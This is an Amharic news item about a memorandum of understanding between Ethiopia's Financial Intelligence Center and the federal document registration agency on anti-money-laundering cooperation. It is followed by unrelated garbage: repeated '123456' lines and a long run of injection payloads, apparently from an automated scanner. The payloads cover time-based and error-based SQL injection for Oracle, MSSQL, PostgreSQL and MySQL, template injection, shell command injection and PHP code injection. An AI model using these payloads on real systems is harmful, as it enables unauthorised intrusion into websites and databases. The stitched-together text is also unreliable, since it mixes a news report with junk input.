የሁለትዮሽ የመግባቢያ ሰነድ የፊርማ ስነ-ስርዓት ተካሄደ
በፋይናንስ ደህንነት የመረጃ ማዕከል እና በፌደራል የሰነዶች ማረጋገጫና ምዝገባ ኤጀንሲ መካከል የመረጃ ልውውጥ ለማድረግና በትብብር ለመስራት የሁለትዮሽ የመግባቢያ ሰነድ የፊርማ ስነ - ስርዓት ተካሄደ፡፡
በወንጅል ድርጊት የተገኘ ገንዘብን ወይም ንብረትን ህጋዊ አስመስሎ ማቅረብ ወንጅልን ለመከላከልና ለመቆጣጠር ሁለቱም ተቋማት በተናጠል የሚያገኙዋቸውን መረጃዎች ለመለዋወጥና በጋራ ለመስራት እንዲቻል የመግባቢያ ሰነድ መዘጋጀቱ በወቅቱ ተገልጿል፡፡
የፋይናንስ ደህንነት የመረጃ ማዕከል ዋና ዳይሬክተር አቶ ቴዎድሮስ በቀለ በወቅቱ እንደተናገሩት የመረጃ ማዕከሉ በአዋጅ በተሰጠው ስልጣን መሰረት በወንጀል ድርጊት የተገኘ ገንዘብን ወይም ንብረትን ህጋዊ አስመስሎ ማቅረብን፣ ሽብርተኝነትን በገንዘብ የመርዳት እና የጅምላ ጨራሽ መሳሪያዎችን ብዜትን በገንዘብ መደገፍ ወንጀሎችን ለመከላከልና ለመቆጣጠር እንዲቻል የተሰጠውን ሀላፊነት በአግባቡ እንዲወጣ በትኩረት እየተሰራ ይገኛል ብለዋል፡፡ አክለውም የፌደራል የሰነዶች ማረጋገጫና ምዝገባ ኤጀንሲ በወንጀል ድርጊት የተገኘ ገንዘብን ወይም ንብረትን ህጋዊ አስመስሎ ማቅረብን ወንጀልን ለመከላከልና ለመቆጣጠር አስፈላጊ የሆኑ መረጃዎችን አጣርቶ በማቅረብ ለማዕከሉ ትብብር እያደረገ በመሆኑ በርካታ ስራዎች መስራት የተቻለ መሆኑን ገልጸው ይህንንም ትብብር ህጋዊ ለማድረግ የመግባቢያ ሰነድ መዘጋጀቱን ተናግረዋል፡፡
የፌደራል ሰነዶች ማረጋገጫና ምዝገባ ኤጀንሲ ዋና ዳይሬክተር አቶ ሙሉቀን አማረ በበኩላቸው እንደተናገሩት ኤጅንሲው የአገልግሎት አሰጣጡን ለማሻሻል በርካታ የሪፎርም ስራዎችን እንደሰራ እና እየሰራ እንደሚገኝ ገልጸው በወንጀል ድርጊት የተገኘ ገንዘብን ወይም ንብረትን ህጋዊ አስመስሎ ማቅረብ ወንጀልን ለመከላከል እንዲቻል መረጃዎችን ለማጥራት የወንጀሉ መንስኤ የሚሆኑ ጉዳዮች ላይ ያለውን የአሰራር ስርዓት ከማንዋል ወደ ዲጂታል መቀየር ላይ ትኩረት ተሰጥቶ እየተሰራ ነው ብለዋል፡፡ ወንጀሉን ለመከላከል እና ለመቆጣጠር ተቋማቸው ከፋይናንስ ደህንነት የመረጃ ማዕከል ጋር በጋራ እንደሚሰራም ጨምረው ተናግረዋል፡፡
በወንጀል ድርጊት የተገኘ ገንዘብን ወይም ንብረት ህጋዊ አስመስሎ ማቅረብ ወንጀልን መከላከል እና መቆጣጠርን በተመለከተ የመረጃ ልውውጥ ማድረግ፣ ወንጀሉን በመከላከልና በመቆጣጠር ዙርያ የግንዛቤ ማስጨበጫ መድረኮችን ማዘጋጀት እና በየጊዜው የሚፈጸሙ አዳዲስ የወንጀል አፈጻጸም ዘዴዎችን አስቀድሞ በመለየት የጋራ ሰትራቴጂ መንደፍ በመግባቢያ ሰነዱ ላይ የተገለጹ በተቋማቱ መካከል የሚኖሩ የትብብር መስኮች ናቸው፡፡
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456'"\(
123456鎈'"\(
123456
123456
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',3)='d
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',0)='a
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('r',3)
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('k',0)
123456'and(select+1)>0waitfor/**/delay'0:0:3
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456/**/and(select+1)>0waitfor/**/delay'0:0:3'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456
123456'/**/and(select'1'from/**/pg_sleep(3))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1086992277')))
123456/**/and/**/cast(md5('1549475201')as/**/int)>0
123456/**/and(select+1/**/from/**/pg_sleep(3))>0/**/
123456'and(select'1'from/**/cast(md5(1390633554)as/**/int))>'0
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
extractvalue(1,concat(char(126),md5(1901093942)))
123456
123456
123456
123456"and(select*from(select+sleep(3))a/**/union/**/select+1)="
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
<%- 970256494+890265171 %>
#set($c=960336216+820141719)${c}$c
123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
${(851378942+853298594)?c}
${944008926+960312761}
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
expr 863943451 + 989706481
/*1*/{{953544374+913588965}}
123456&set /A 802243675+822484567
(select*from(select+sleep(3)union/**/select+1)a)
123456$(expr 927195191 + 850394171)
(select*from(select+sleep(0)union/**/select+1)a)
123456
123456|expr 885740803 + 837010600
123456
123456 expr 955290830 + 964143145
123456
123456"and"x"="k
123456
123456"and"b"="b
123456
123456
123456'and'm'='h
123456'and'b'='b
123456/**/and+3=9
123456/**/and+4=4
123456
${933515094+819788518}
123456
${@var_dump(md5(687779411))};
123456
123456
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1608718952)))and'
123456
szgabdamcngfbeznbadz
123456
123456
123456
123456
123456
123456